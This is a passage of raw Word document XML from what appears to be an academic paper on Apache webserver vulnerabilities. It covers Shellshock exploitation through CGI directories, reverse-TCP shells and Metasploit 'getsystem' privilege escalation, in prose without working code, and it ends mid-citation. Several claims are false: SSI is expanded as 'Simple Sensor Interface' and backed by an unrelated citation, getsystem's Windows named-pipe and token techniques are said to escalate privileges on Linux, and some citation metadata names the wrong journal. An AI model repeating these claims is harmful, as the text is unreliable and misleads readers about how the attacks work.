        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/978-3-642-39498-0_4","ISBN":"9783642394980","abstract":"In economic models of cybersecurity, security investment yields positive, but diminishing, returns. If that were true for software vulnerabilities, fix rates should decrease, whereas the time between successive fixes should go up as vulnerabilities become fewer and harder to fix.In this work, we examine the empirical evidence for this hypothesis for Mozilla, Apache httpd and Apache Tomcat over the last several years. By looking at 292 vulnerability reports for Mozilla, 66 for Apache, and 21 for Tomcat, we find that the number of people committing vulnerability fixes changes proportionally to the number of vulnerability fixes for Mozilla and Tomcat, but not for Apache httpd.Our findings do not support the hypothesis that vulnerability fix rates decline. It seems as if the supply of easily fixable vulnerabilities is not running out and returns are not diminishing (yet).Additionally, software security has traditionally been viewed as an arms race between attackers and defenders. Recent work in an unrelated field has produced precise mathematical models for such arms races, but again the evidence we find is scant and does not support the hypothesis of an arms race (of this kind).","author":[{"dropping-particle":"","family":"Neuhaus","given":"Stephan","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Plattner","given":"Bernhard","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Economics of Information Security and Privacy","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"title":"Software security economics: Theory, in practice","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=3fa9cfbb-df80-4e13-bf75-388482a7029d"]},{"id":"ITEM-2","itemData":{"DOI":"10.1093/geront/gns169","ISBN":"1565923227","ISSN":"1537-6613","PMID":"24760730","abstract":"This complete guide to setting up and running a TCP/IP network is essential for network administrators, and invaluable for users of home systems that access the Internet. The book starts with the fundamentals - what protocols do and how they work, how addresses and routing are used to move data through the network, how to set up your network connection - and then covers, in detail, everything you need to know to exchange information via the Internet. Included are discussions on advanced routing protocols (RIPv2, OSPF, and BGP) and the gated software package that implements them, a tutorial on configuring important network services - including DNS, Apache, sendmail, Samba, PPP, and DHCP - as well as expanded chapters on troubleshooting and security. \"TCP/IP Network Administration\" is also a command and syntax reference for important packages such as gated, pppd, named, dhcpd, and sendmail. With coverage that includes Linux, Solaris, BSD, and System V TCP/IP implementations, the third edition contains: Overview of TCP/IP Delivering the data Network services Getting startedM Basic configuration Configuring the interface Configuring routing Configuring DNS Configuring network servers Configuring sendmail Configuring Apache Network security Troubleshooting Appendices include \"dip,\" \"ppd,\" and \"chat\" reference, a \"gated\" reference, a \"dhcpd\" reference, and a \"sendmail\" reference This new edition includes ways of configuring Samba to provide file and print sharing on networks that integrate Unix and Windows, and a new chapter is dedicated to the important task of configuring the Apache web server. Coverage of network securitynow includes details on OpenSSH, stunnel, gpg, iptables, and the access control mechanism in xinetd. Plus, the book offers updated information about DNS, including details on BIND 8 and BIND 9, the role of classless IP addressing and network prefixes, and the changing role of registrars. Without a doubt, \"TCP/IP Network Administration, 3rd Edition\" is a must-have for all network administrators and anyone who deals with a network that transmits data over the Internet.","author":[{"dropping-particle":"","family":"Hunt","given":"Craig","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Journal of infectious diseases","id":"ITEM-2","issued":{"date-parts":[["2002"]]},"title":"TCP/IP Network Administration","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=e04853d1-f514-4f5d-ba94-4a01b42e1852"]}],"mendeley":{"formattedCitation":"[43], [54]","plainTextFormattedCitation":"[43], [54]","previouslyFormattedCitation":"[43], [54]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00535276" w:rsidRPr="00535276">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[43], [54]</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F135D" w14:textId="3137B6B7" w:rsidR="00D66503" w:rsidRDefault="00AB7DF5" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The most prevalent vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t xml:space="preserve">ies </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">within </w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve">webserver reside within the webserver scripting languages </w:t>
      </w:r>
      <w:r w:rsidR="003153F7" w:rsidRPr="003153F7">
        <w:t>Hypertext Pre</w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t>-P</w:t>
      </w:r>
      <w:r w:rsidR="003153F7" w:rsidRPr="003153F7">
        <w:t>rocessor</w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve"> ((PHP) – recursive acronym), C</w:t>
      </w:r>
      <w:r w:rsidR="003153F7" w:rsidRPr="003153F7">
        <w:t xml:space="preserve">ommon </w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="003153F7" w:rsidRPr="003153F7">
        <w:t xml:space="preserve">ateway </w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="003153F7" w:rsidRPr="003153F7">
        <w:t>nterface</w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve"> (CGI) </w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISSN":"2319-7064","abstract":" In the world of the Internet, Apache and Internet Information Server (IIS) were the web servers that were developed for exchanging the information between clients computer having different Operation System. The only function of IIS is that of displaying static information such as HTML and image files onto the Web Browser. But the major problem lies here that when the information is updated in the database, the administrator has to update it by manual operation. Because it is necessary to update several places about the same information, the work load becomes higher than it is assumed, thus the updation of error and omission may occur. Such problems faced by the Web Developers were solved by the use of a Common Gateway Interface (CGI) program such as a bulletin board system and a Blog system. However, these programs are opened to Internet and often they don?t have user authentication and access control mechanism. This means that they have the problem that the user can access it easily and freely only by getting the URL and inputting it into a Web Browser. Common Gateway Interface (CGI) is a standard method used to generate dynamic content for the Web pages and Web applications. When implementation of CGI is done on a Web server, it provides with an interface between the Web server and programs that generate the Web content. These programs are popularly known as CGI scripts or simply CGIs; they are usually written in a scripting language, but can also be written in any other programming language. ","author":[{"dropping-particle":"","family":"Kamal Kathuria Chaynika Kapoor","given":"Apoorva Adlakha","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Science and Research (IJSR)","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"Common Gateway Interface","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=d82e8b50-28cc-4227-ae9c-8809c6c1e795"]}],"mendeley":{"formattedCitation":"[55]","plainTextFormattedCitation":"[55]","previouslyFormattedCitation":"[55]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00535276" w:rsidRPr="00535276">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[55]</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="003153F7" w:rsidRPr="003153F7">
        <w:t>Simple Sensor Interface</w:t>
      </w:r>
      <w:r w:rsidR="003153F7">
        <w:t xml:space="preserve"> (SSI)</w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/2502081.2502223","ISBN":"9781450324045","abstract":"Automatic detection and interpretation of social signals carried by voice, gestures, mimics, etc. will play a key-role for next-generation interfaces as it paves the way towards a more intuitive and natural human-computer interaction. The paper at hand introduces Social Signal Interpretation (SSI), a framework for real-time recognition of social signals. SSI supports a large range of sensor devices, filter and feature algorithms, as well as, machine learning and pattern recognition tools. It encourages developers to add new components using SSI's C++ API, but also addresses front end users by offering an XML interface to build pipelines with a text editor. SSI is freely available under GPL at http://openssi.net. Copyright © 2013 ACM.","author":[{"dropping-particle":"","family":"Wagner","given":"Johannes","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lingenfelser","given":"Florian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Baur","given":"Tobias","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Damian","given":"Ionut","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kistler","given":"Felix","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"André","given":"Elisabeth","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"MM 2013 - Proceedings of the 2013 ACM Multimedia Conference","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"title":"The social signal interpretation (SSI) framework: Multimodal signal processing and recognition in real-time","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=9cab0758-1dbb-4e52-95b4-5c5787db3c0c"]}],"mendeley":{"formattedCitation":"[56]","plainTextFormattedCitation":"[56]","previouslyFormattedCitation":"[56]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00535276" w:rsidRPr="00535276">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[56]</w:t>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00535276">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t>features</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t xml:space="preserve"> Security researchers advise these features </w:t>
      </w:r>
      <w:r w:rsidR="00E95B06">
        <w:t xml:space="preserve">should </w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t>be disabled within Apache webservers when there is highly sensitive data being stored within the system</w:t>
      </w:r>
      <w:r w:rsidR="00E95B06">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t xml:space="preserve"> because security of these features cannot be guaranteed as they are highly vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00E95B06">
        <w:t xml:space="preserve">to attack </w:t>
      </w:r>
      <w:r w:rsidR="009D141D">
        <w:t>due to their architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A60B93" w14:textId="7F29203D" w:rsidR="00AE5341" w:rsidRDefault="00A95E87" w:rsidP="00B75E7D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>One of the most prevalent</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t xml:space="preserve"> Apache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webserver vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve">concerning the use of CGI scripts </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>discovered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by researchers </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>12/09/14 called ‘Shellshock’</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"author":[{"dropping-particle":"","family":"Enache","given":"Tudor","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2014"]]},"number-of-pages":"1-10","title":"Shellshock Vulnerability","type":"report"},"uris":["http://www.mendeley.com/documents/?uuid=36b42a6b-287a-3261-83cf-4a59c2e56d30"]}],"mendeley":{"formattedCitation":"[57]","plainTextFormattedCitation":"[57]","previouslyFormattedCitation":"[57]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[57]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> or ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00211E5D">
        <w:t>Bashdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00211E5D">
        <w:t>’ (</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D" w:rsidRPr="00211E5D">
        <w:t>CVE-2014-6271</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.","author":[{"dropping-particle":"","family":"MITRE","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"MITRE","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"CVE - CVE-2014-6278","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=a1fb1193-2bde-47fa-bb5b-55a068945074"]}],"mendeley":{"formattedCitation":"[58]","plainTextFormattedCitation":"[58]","previouslyFormattedCitation":"[58]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[58]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>, this vulnerability allowed attackers to inject and execute remote shell BASH code</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve"> within the </w:t>
      </w:r>
      <w:r w:rsidR="003D3EB0">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA4830">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA4830">
        <w:t>-sys/</w:t>
      </w:r>
      <w:r w:rsidR="003D3EB0">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="003D3EB0">
        <w:t>[/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA4830">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA4830">
        <w:t>-bin/</w:t>
      </w:r>
      <w:r w:rsidR="003D3EB0">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve"> directories</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> the webserver</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> that allowed attackers to </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>inject and run</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>malicious ‘</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve">script that </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>opened</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve"> a reverse connection </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>back to the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t xml:space="preserve"> device</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> access to the Linux </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>BASH shell</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> the webserver </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> hosted on</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57373E77" w14:textId="540ED1D0" w:rsidR="00B75E7D" w:rsidRDefault="00BA4830" w:rsidP="00B75E7D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the attacker </w:t>
      </w:r>
      <w:r w:rsidR="001913B4">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connected to the Linux shell</w:t>
      </w:r>
      <w:r w:rsidR="004C4A69">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve">permissions </w:t>
      </w:r>
      <w:r w:rsidR="001913B4">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> then be escalated</w:t>
      </w:r>
      <w:r w:rsidR="001913B4">
        <w:t xml:space="preserve"> by utilising </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C4A69">
        <w:t>post exploitation Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> Framework </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://metasploit.help.rapid7.com/docs/msf-overview","abstract":"metasploit","accessed":{"date-parts":[["2018","5","23"]]},"author":[{"dropping-particle":"","family":"Rapid7","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"metasploit.rapid7.com","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Metasploit Framework","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=f6f169ea-4181-39ce-ada7-4ada9ed36fb1"]}],"mendeley":{"formattedCitation":"[59]","plainTextFormattedCitation":"[59]","previouslyFormattedCitation":"[59]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[59]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004C4A69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="004C4A69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t>written in the ‘Ruby’</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1017/CBO9781107415324.004","ISBN":"9780596516178","ISSN":"08203946","PMID":"9988578","abstract":"The Ruby Programming Language is the authoritative guide to Ruby and provides comprehensive coverage of versions 1.8 and 1.9 of the language. It was written (and illustrated!) by an all-star team: David Flanagan, bestselling author of programming language \"bibles\" (including JavaScript: The Definitive Guide and Java in a Nutshell) and committer to the Ruby Subversion repository. Yukihiro \"Matz\" Matsumoto, creator, designer and lead developer of Ruby and author of Ruby in a Nutshell, which has been expanded and revised to become this book. why the lucky stiff, artist and Ruby programmer extraordinaire. This book begins with a quick-start tutorial to the language, and then explains the language in detail from the bottom up: from lexical and syntactic structure to datatypes to expressions and statements and on through methods, blocks, lambdas, closures, classes and modules. The book also includes a long and thorough introduction to the rich API of the Ruby platform, demonstrating - with heavily-commented example code - Ruby's facilities for text processing, numeric manipulation, collections, input/output, networking, and concurrency. An entire chapter is devoted to Ruby's metaprogramming capabilities. The Ruby Programming Language documents the Ruby language definitively but without the formality of a language specification. It is written for experienced programmers who are new to Ruby, and for current Ruby programmers who want to challenge their understanding and increase their mastery of the language.","author":[{"dropping-particle":"","family":"Flanagan","given":"David","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Matsumoto","given":"Yukihiro","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Httpwwwrubylangorg","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"title":"The Ruby Programming Language","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=510cda78-ff5a-41a8-9927-2216e70b0740"]}],"mendeley":{"formattedCitation":"[60]","plainTextFormattedCitation":"[60]","previouslyFormattedCitation":"[60]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[60]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> scripting language </w:t>
      </w:r>
      <w:r w:rsidR="004C4A69">
        <w:t>called; ‘GETSYSTEM’</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Much has been written about using the Metasploit Framework, but what has received minimal attention is an analysis of how it accomplishes what it does. This paper provides an analysis of the post-exploitation activity of a Meterpreter shell on a compromised Windows 7 system. Areas looked at include the characteristics of the stager and payload, fingerprinting the HTTP C2 and beaconing traffic, finding Meterpreter in memory, and several post-exploitation modules that could be used. By focusing on what occurs instead of how to accomplish it, defenders are better equipped to detect and respond.","author":[{"dropping-particle":"","family":"Wadner","given":"Kiel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"SANS Institute Information Security Reading Room","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"An Analysis of Meterpreter during Post-Exploitation","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=e283c7d1-cbf5-4c4d-949a-453a53028bbc"]},{"id":"ITEM-2","itemData":{"URL":"https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"Cobalt Security","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"cobaltstrike.com","id":"ITEM-2","issued":{"date-parts":[["2014"]]},"page":"1-1","title":"What happens when I type getsystem? | Strategic Cyber LLC","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=0c1a7068-935e-3681-aa2b-a18d06dc431e"]}],"mendeley":{"formattedCitation":"[61], [62]","plainTextFormattedCitation":"[61], [62]","previouslyFormattedCitation":"[61], [62]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[61], [62]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t xml:space="preserve"> which</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> elevates privileges using an existing user system service pipe to gain root access</w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t>, the script uses three techniques to escalate privileges within a Linux system which are; Named Pipe Impersonation (In Memory/Admin), Service - Named Pipe Impersonation (Dropper/Admin)</w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t xml:space="preserve"> Service - Token Duplication (In Memory/Admin) </w:t>
      </w:r>
      <w:r w:rsidR="002F6194" w:rsidRPr="00AA4155">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>this is possible due to</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> sensitive information not being flushed from the cache memory </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
